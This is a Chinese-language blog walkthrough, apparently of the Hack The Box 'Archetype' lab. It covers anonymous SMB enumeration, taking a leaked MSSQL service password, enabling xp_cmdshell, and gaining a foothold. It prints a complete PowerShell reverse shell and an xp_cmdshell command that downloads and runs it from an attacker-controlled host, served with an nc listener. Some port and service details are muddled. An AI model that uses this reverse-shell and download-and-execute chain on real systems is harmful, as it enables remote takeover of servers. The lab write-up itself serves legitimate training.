SMB+MSSQL

常规nmap扫描目标IP，得到有哪些端口号开放以及哪些服务，可以看到SMB协议的1433端口号开放，伴随着还有MySQL的服务。

利用SMB中的smbclient工具远程连接并枚举：

smbclient -N -L \\{TARGET_IP}\    #-N：no password ,-L:查找的服务在服务器端是是可适用的。

针对出现的一组share，经过试验，ADMIN$和C$并不能被访问，因为只能访问backups目录， 根据下述命令枚举backups：

smbclient -N \\{TARGET_IP}\backups

 下图展示了SMB远程连接目标IP，查看目录，下载配置文件，并退出，一整个流程。

 查看配置文件中的内容（关键内容：密码和用户信息）：

 密码：M3g4c0rp123，用户：ARCHETYPE\sql_svc

根据提供的信息，需要采用一个工具连接MSSQL服务器，在这里采用impacket工具。

Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的低级编程访问，对于某些协议（如SMB1-3和MSRPC），提供协议实现本身。数据包可以从零开始构造，也可以从原始数据解析，而面向对象的API使使用深层协议层次结构变得简单。该库提供了一组工具，作为在该库的上下文中可以执行的 *** 作的示例。

关于他如何安装，在这里就不在多余解释。直接采用命令行连接MSSQL：

target_IP前面的是用户，之后会输入前面配置文件中的密码。

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

 首先，需要确认我们连接的对象是否在服务中：

SELECT is_srvrolemember('sysadmin');

 设置相关命令，需要令在该连接模式下可以执行cmd命令。

 设置成功：

 到这里，我们已经初步拿到shell了。

持久化shell

SQL Server的shel还略显单薄，既然是Windows，那么就尝试用Powershell脚本、nc监听做一个持久化的连接。

第一行的IP填写最开始获取的Kali IP，注意网段

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.226",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

将它保存到kali的桌面，名称为shell.ps1

之后用python起一个服务器，以便靶机访问脚本、下载脚本，服务器在桌面起，和shell.ps1在同一个文件夹

python3 -m http.server 80

要确保起了后能访问到脚本

nc起一个监听用于shell交互，端口同上所设置的443

nc -lvnp 443

 返回mssqlclient，让靶机访问、下载、运行脚本，同理xxx是Kali IP

mssqlclient.py ARCHETYPE/[email protected] -windows-auth
SQL \> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.xxx/shell.ps1\");"

如果成功连接在其他两个窗口就可以顺利看到监听到主机，

 

 

 

 『Hack The Box』Archetype

『Hack The Box』Archetype_Ho1aAs的博客-CSDN博客